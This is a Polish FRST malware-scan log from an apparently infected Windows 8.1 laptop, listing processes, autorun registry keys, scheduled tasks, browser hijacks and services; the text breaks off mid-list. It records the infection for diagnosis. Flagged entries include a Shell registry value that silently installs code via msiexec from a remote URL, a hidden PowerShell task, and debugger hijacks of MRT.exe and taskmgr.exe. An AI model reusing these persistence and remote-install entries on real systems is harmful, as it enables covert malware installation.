Rezultaty skanowania Farbar Recovery Scan Tool (FRST) (x64) Wersja: 17-01-2021 Uruchomiony przez Byaku (administrator) BYAKUYA (LENOVO 20250) (17-01-2021 13:53:53) Uruchomiony z C:\Users\Byaku\Downloads Załadowane profile: Byaku Platform: Windows 8.1 (Update) (X64) Język: Polski (Polska) Domyślna przeglądarka: "C:\Program Files (x86)\Bagsarah\Application\chrome.exe" "%1" Tryb startu: Normal ==================== Procesy (filtrowane) ================= (Załączenie wejścia w fixlist spowoduje zamknięcie procesu. Powiązany plik nie zostanie przeniesiony.) () [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\calibre.exe () [Brak podpisu cyfrowego] C:\Program Files (x86)\Calibre2\calibre-parallel.exe <2> (Adobe Inc. -> ) C:\Program Files (x86)\Adobe\Adobe Sync\CoreSync\CoreSync.exe (Adobe Inc. -> Adobe Inc) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud Helper.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe (Adobe Inc. -> Adobe Inc.) C:\Program Files\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe <4> (Adobe Inc. -> Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\CCLibrary.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe (Adobe Inc. -> Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe (Broadcom Corporation -> Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe (Brother Industries, Ltd.) [Brak podpisu cyfrowego] C:\Program Files (x86)\Brother\Brmfcmon\BrMfcMon.exe (Don HO don.h@free.fr) [Brak podpisu cyfrowego] C:\Program Files (x86)\notepad2\notepad2.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <32> (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe (Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe (Guangzhou Ugee Computers Technology Co.,Ltd -> Ugee Technology Company Ltd) C:\Program Files\Pentablet\PentabletService.exe (IDT, Inc.) [Brak podpisu cyfrowego] C:\Program Files\IDT\WDM\stacsv64.exe (IDT, Inc.) [Brak podpisu cyfrowego] C:\Program Files\IDT\WDM\sttray64.exe (Intel Corporation - Intel® Management Engine Firmware -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe (Intel Corporation - pGFX -> ) C:\Windows\System32\igfxTray.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxCUIService.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxEM.exe (Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxHK.exe (Intel Corporation - Software and Firmware Products -> Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe (Intel Corporation-Mobile Wireless Group -> Intel Corporation) C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe (Intel(R) Corporation) [Brak podpisu cyfrowego] C:\Program Files\Intel\iCLS Client\HeciServer.exe (Lenovo (Beijing) Limited -> Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe (Lenovo (Beijing) Limited -> Lenovo(beijing) Limited) C:\Program Files (x86)\Lenovo\Energy Manager\utility.exe (Microsoft Corporation -> Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\rundll32.exe (Microsoft Windows Publisher -> Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe (Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\devmonsrv.exe (Motorola Solutions Inc. -> Motorola Solutions, Inc.) C:\Program Files (x86)\Intel\Bluetooth\obexsrv.exe (Node.js Foundation -> Node.js) C:\Program Files\Common Files\Adobe\Creative Cloud Libraries\libs\node.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe (NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe <3> (NVIDIA Corporation -> NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe <2> (Open Source Developer, Derick Payne -> Rizonesoft) C:\Users\Byaku\Downloads\ComIntRep_5003\ComIntRep_5003\ComIntRep_X64.exe (Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe (Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe (Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAConsole.exe (Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe (Panda Security S.L. -> Panda Security, S.L.) C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAService.exe (Qihoo 360 Software (Beijing) Company Limited -> ) C:\Users\Byaku\AppData\Roaming\360bizhi\Utils\NavPlugin.exe (Qihoo 360 Software (Beijing) Company Limited -> ) C:\Users\Byaku\AppData\Roaming\360bizhi\Utils\RunDll.exe (Qihoo 360 Software (Beijing) Company Limited -> www.ludashi.com) C:\Users\Byaku\AppData\Roaming\360bizhi\wallpaperhelper\guardhp.exe ==================== Rejestr (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci. Powiązany plik nie zostanie przeniesiony.) HKLM\...\Run: [Energy Manager] => C:\Program Files (x86)\Lenovo\Energy Manager\Energy Manager.exe [15794160 2013-11-27] (Lenovo (Beijing) Limited -> Lenovo(beijing) Limited) HKLM\...\Run: [Lenovo Utility] => C:\Program Files (x86)\Lenovo\Energy Manager\Utility.exe [80368 2013-11-27] (Lenovo (Beijing) Limited -> Lenovo(beijing) Limited) HKLM\...\Run: [BTMTrayAgent] => C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll [7770936 2013-04-12] (Motorola Solutions Inc. -> Motorola Solutions, Inc.) HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1703424 2013-08-11] (IDT, Inc.) [Brak podpisu cyfrowego] HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2462536 2014-10-16] (NVIDIA Corporation -> NVIDIA Corporation) HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\nvspcap64.dll [2800296 2014-10-16] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) [Brak podpisu cyfrowego] HKLM\...\Run: [BCSSync] => C:\Program Files\Microsoft Office\Office14\BCSSync.exe [108144 2012-11-05] (Microsoft Corporation -> Microsoft Corporation) HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-10] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM\...\Run: [MRT] => C:\Windows\system32\MRT-KB890830.exe [133315992 2018-06-15] (Microsoft Corporation -> Microsoft Corporation) HKLM\...\Run: [AdobeGCInvoker-1.0] => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated) HKLM\...\Run: [PentabletService] => C:\Program Files\Pentablet\PentabletService.exe [2242328 2020-07-20] (Guangzhou Ugee Computers Technology Co.,Ltd -> Ugee Technology Company Ltd) HKLM-x32\...\Run: [BrMfcWnd] => C:\Program Files (x86)\Brother\Brmfcmon\BrMfcWnd.exe [1163264 2012-09-25] () [Brak podpisu cyfrowego] HKLM-x32\...\Run: [ControlCenter3] => C:\Program Files (x86)\Brother\ControlCenter3\brctrcen.exe [114688 2008-12-24] (Brother Industries, Ltd.) [Brak podpisu cyfrowego] HKLM-x32\...\Run: [gmsd_pl_93] => [X] HKLM-x32\...\Run: [gmsd_pl_103] => [X] HKLM-x32\...\Run: [gmsd_pl_109] => [X] HKLM-x32\...\Run: [gmsd_pl_113] => [X] HKLM-x32\...\Run: [gmsd_pl_114] => [X] HKLM-x32\...\Run: [DiskPower] => C:\Program Files (x86)\DPower\DiskPower.exe [210432 2016-07-21] () [Brak podpisu cyfrowego] <==== UWAGA HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Brak podpisu cyfrowego] HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated) HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2091064 2020-07-17] (Adobe Inc. -> Adobe Inc.) HKLM-x32\...\Run: [Adobe CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-09-14] (Adobe Inc. -> ) HKLM-x32\...\Run: [PSUAMain] => C:\Program Files (x86)\Panda Security\Panda Security Protection\PSUAMain.exe [165120 2019-10-16] (Panda Security S.L. -> Panda Security, S.L.) HKLM\...\Winlogon: [Userinit] C:\Windows\SysWOW64\userinit.exe, <==== UWAGA HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Run: [360wp-srv] => C:\Users\Byaku\AppData\Roaming\360bizhi\360wpsrv.exe [1636264 2016-12-08] (Qihoo 360 Software (Beijing) Company Limited -> 360.cn) HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Run: [CCXProcess] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\CCXProcess.exe [114824 2020-09-14] (Adobe Inc. -> ) HKU\S-1-5-21-2709180964-3026329352-173763364-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj85OTlQNjVYRTkcNdF2MTlLNYUxFdwcRUF4RWFyMdzYNF== /q <==== UWAGA HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-12] (Google LLC -> Google LLC) HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2020-05-04] (Adobe Inc. -> Adobe Systems, Inc.) AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [174856 2014-10-16] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [156840 2014-10-16] (NVIDIA Corporation PE Sign v2014 -> NVIDIA Corporation) IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Shubocult\_ALLOWDEL_aa7f2cc\Gubed.exe -Yrrehs IFEO\taskmgr.exe: [Debugger] GroupPolicy: Ograniczenia - Chrome <==== UWAGA Policies: C:\ProgramData\NTUSER.pol: Ograniczenia <==== UWAGA Policies: C:\Users\Byaku\NTUSER.pol: Ograniczenia <==== UWAGA HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA ==================== Zaplanowane zadania (filtrowane) ============ (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {19F5D4F6-00BA-44A4-9758-54B40835CB03} - System32\Tasks\Mrsycikesh Agent => C:\Program Files (x86)\Kdaghgujuent\bnent.exe [779712 2016-12-11] (Glarysoft LTD -> Glarysoft Ltd) Task: {20E410C7-9A9B-423C-9805-717B37F782CB} - System32\Tasks\{DF10CBC6-AC0F-43C1-95C4-0CC3585A4F2E} => C:\Windows\system32\pcalua.exe -a C:\PROGRA~2\COMMON~1\INSTAL~1\DRIVER\7\INTEL3~1\IDRIVER.EXE -d C:\Windows\SysWOW64 -c /reboot{07A540AB-D785-11D5-8E89-0090275862A0} /z Task: {4783069E-8515-4671-B8AF-FAEC7CED0DB0} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\Windows\system32\MRT.exe [120636720 2020-05-13] (Microsoft Windows -> Microsoft Corporation) Task: {5B0544EF-D1A1-499A-BA49-2ECD6DAE9ACE} - System32\Tasks\AdobeGCInvoker-1.0 => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [3402832 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated) Task: {5D7612A8-C6DE-4DB6-8081-BBC3F416C77E} - System32\Tasks\PC SpeedUp Service Deactivator => C:\Program Files (x86)\Przyspiesz Komputer\PCSUSD.exe <==== UWAGA Task: {60FDCB38-0139-4E80-8A97-716671ECDDE9} - System32\Tasks\{8C34442B-70C3-49F8-B920-753547265428} => C:\Windows\system32\pcalua.exe -a C:\PaintToolSAI\uninst.exe -d C:\PaintToolSAI Task: {6338096B-7333-47AE-8D1E-BE8AFA05CC93} - Brak ścieżki do pliku Task: {718B63A9-375E-4828-B31B-F3B93BB84EE3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.) Task: {7A7B10AE-5E6D-4083-BB14-060AAF25900A} - System32\Tasks\{96B12D76-B345-44D3-9FB3-1CA29A32D516} => C:\Program Files (x86)\Panda Security\Panda Security Protection\JobLauncher.exe [107976 2019-06-06] (Panda Security S.L. -> Panda Security, S.L.) Task: {A20436DB-2CC0-411B-8501-049136F2EDC2} - Brak ścieżki do pliku Task: {B04E4E2E-589F-4E3D-8D95-4DDF21A4500E} - Brak ścieżki do pliku Task: {B191E081-3F7C-4EE6-986D-AD74AB6B946E} - Brak ścieżki do pliku Task: {B77DE1B8-5F27-4D76-8C03-9D9EC43C625D} - Brak ścieżki do pliku Task: {B7B6848A-CE8A-4266-BA31-443CA3EC195A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-07] (Google Inc -> Google Inc.) Task: {BDF4F148-7284-45B3-A6E3-F037486ED754} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== UWAGA Task: {F1194221-A49D-4C53-B742-C061C81444D2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-08-07] (Google Inc -> Google Inc.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\PC SpeedUp Service Deactivator.job => C:\Program Files (x86)\Przyspiesz Komputer\PCSUSD.exe <==== UWAGA Task: C:\Windows\Tasks\{96B12D76-B345-44D3-9FB3-1CA29A32D516}.job => C:\Program Files (x86)\Panda Security\Panda Security Protection\JobLauncher.exe ==================== Internet (filtrowane) ==================== (Załączenie wejścia w fixlist, w przypadku gdy jest to obiekt rejestru, spowoduje usunięcie go z rejestru lub przywrócenie jego domyślnej postaci.) Hosts: W pliku Hosts jest więcej niż jedno wejście. Sprawdź sekcję Hosts w Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{35242337-E577-453E-AEC9-677CF8AEEE5D}: [DhcpNameServer] 192.168.0.1 Tcpip\..\Interfaces\{8C20FF42-A164-4F08-ABF3-586EF5B9DE68}: [DhcpNameServer] 192.168.2.1 FireFox: ======== FF DefaultProfile: 9xdg7m8e.default FF DefaultProfile: ir2zjn1y.default FF ProfilePath: C:\Users\Byaku\AppData\Roaming\Mozilla\Firefox\Profiles\9xdg7m8e.default [2016-12-11] FF Homepage: Mozilla\Firefox\Profiles\9xdg7m8e.default -> C:\ProgramData\Konksolexs\ff.HP FF NewTab: Mozilla\Firefox\Profiles\9xdg7m8e.default -> C:\ProgramData\Konksolexs\ff.NT FF Extension: (CinemaPlus-4.1v) - C:\Users\Byaku\AppData\Roaming\Mozilla\Firefox\Profiles\9xdg7m8e.default\Extensions\525eaf00-9712-4ce5-9c71-9aa6a175421b@gmail.com [2015-08-04] [Przestarzałe] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\Byaku\AppData\Roaming\Mozilla\Firefox\Profiles\9xdg7m8e.default\searchplugins\findit.xml [2016-12-11] FF ProfilePath: C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default [2017-09-22] <==== UWAGA FF Homepage: Firefox\Firefox\Profiles\ir2zjn1y.default -> hxxp://www.searchinme.com/ FF Extension: (SimilarWeb) - C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-02-03] [Przestarzałe] [Brak podpisu cyfrowego] FF Extension: (FF Adr) - C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-02-03] [Brak podpisu cyfrowego] FF Extension: (Polski Language Pack) - C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\Extensions\langpack-pl@firefox.mozilla.org.xpi [2017-05-15] [Przestarzałe] [Brak podpisu cyfrowego] FF SearchPlugin: C:\Users\Byaku\AppData\Roaming\Firefox\Firefox\Profiles\ir2zjn1y.default\searchplugins\startsearch.xml [2017-05-15] FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation) FF Plugin: @videolan.org/vlc,version=2.2.0 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-02-27] (VideoLAN) [Brak podpisu cyfrowego] FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2020-07-17] (Adobe Inc. -> Adobe Systems) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-04] (Intel® Identity Protection Technology Software -> Intel Corporation) FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-04] (Intel® Identity Protection Technology Software -> Intel Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation -> Microsoft Corporation) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2020-07-17] (Adobe Inc. -> Adobe Systems) Chrome: ======= CHR Profile: C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-02-01] <==== UWAGA CHR HomePage: ChromeDefaultData -> hxxp://www.amisites.com/?type=hp&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT CHR StartupUrls: ChromeDefaultData -> "hxxp://www.amisites.com/?type=hp&ts=1481911074&z=66c9b926796e1e2f5751a45g8z9bbgateg1g3e9m5o&from=che0812&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT" CHR NewTab: ChromeDefaultData -> Not-active:"chrome-extension://fdckocnfhibclnnkifmjbbogcfkbijki/main.html" CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.amisites.com/search/?type=ds&ts=1483971231&z=8aa6b35883f51e431adfa77gfz4b6cct8m1g1o6c9g&from=archer1028&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT&q={searchTerms} CHR DefaultSearchKeyword: ChromeDefaultData -> amisites CHR Session Restore: ChromeDefaultData -> [funkcja włączona] CHR Extension: (Prezentacje Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-11] CHR Extension: (Dokumenty Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-11] CHR Extension: (Dysk Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-11] CHR Extension: (YouTube) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-11] CHR Extension: (Browser Hunt) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\fdckocnfhibclnnkifmjbbogcfkbijki [2016-12-11] CHR Extension: (Arkusze Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-11] CHR Extension: (Dokumenty Google offline) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-11] CHR Extension: (AdBlock) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2017-01-31] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-01-19] CHR Extension: (Search People) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\papbadoldddalgcjcicnikcfenodpghp [2016-12-12] CHR Extension: (Gmail) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-11] CHR Extension: (Chrome Media Router) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-17] CHR Profile: C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default [2021-01-17] CHR HomePage: Default -> hxxp://do-search.com/?type=hp&ts=1425918500&from=cor&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT CHR StartupUrls: Default -> "hxxp://do-search.com/?type=hp&ts=1425918500&from=cor&uid=ST1000LM014-SSHD-8GB_W3813VKTXXXXW3813VKT","hxxp://search.yahoo.com/?fr=hp-ddc-bd&type=616_pr__alt__ddc_dsssyc_bd_com" CHR Session Restore: Default -> [funkcja włączona] CHR Extension: (Dokumenty) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-13] CHR Extension: (Dysk Google) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2020-10-23] CHR Extension: (YouTube) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-02-03] CHR Extension: (Adobe Acrobat) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-12-16] CHR Extension: (AdBlock — najlepszy bloker reklam) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-16] CHR Extension: (Usługa zwrotu gotówki LetyShops) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\lphicbbhfmllgmomkkhjfkpbdlncafbn [2020-12-29] CHR Extension: (Into The Mist) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\mgihmkgobaljfehcadcckdggpeojaadh [2017-10-14] CHR Extension: (Płatności w sklepie Chrome Web Store) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-01] CHR Extension: (Prolific Assistant) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\ocfncbnofopjedoepmekajbgdenadepp [2020-07-04] CHR Extension: (Gmail) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-23] CHR Extension: (Chrome Media Router) - C:\Users\Byaku\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-11-30] CHR HKU\S-1-5-21-2709180964-3026329352-173763364-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] CHR HKLM-x32\...\Chrome\Extension: [iinglghmhcgdgjjlafobajghjamdchik] ==================== Usługi (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.) R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [844856 2020-06-20] (Adobe Inc. -> Adobe Inc.) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3739728 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated) R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [3511376 2020-09-23] (Adobe Inc. -> Adobe Systems, Incorporated) S2 CSHMDR; C:\Users\Byaku\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [Brak podpisu cyfrowego] R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [733696 2013-05-11] (Intel(R) Corporation) [Brak podpisu cyfrowego] R2 Intel(R) Wireless Bluetooth(R) 4.0 Radio Management; C:\Program Files (x86)\Intel\Bluetooth\ibtrksrv.exe [156104 2013-06-04] (Intel Corporation-Mobile Wireless Group -> Intel Corporation) R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Security Protection\PSANHost.exe [109536 2019-10-16] (Panda Security S.L. -> Panda Security, S.L.) R2 Ntp2NetSvc; C:\Program Files (x86)\notepad2\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr) [Brak podpisu cyfrowego] S2 Ntp2UpSvc; C:\Program Files (x86)\Common Files\ntp2UpSvc\notepad2.exe [2340864 2017-02-16] (Don HO don.h@free.fr) [Brak podpisu cyfrowego] S3 Panda VPN Service; C:\Program Files (x86)\Panda Security\Panda Security Protection\Hydra.Sdk.Windows.Service.exe [320848 2017-11-20] (AnchorFree Inc -> ) R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices 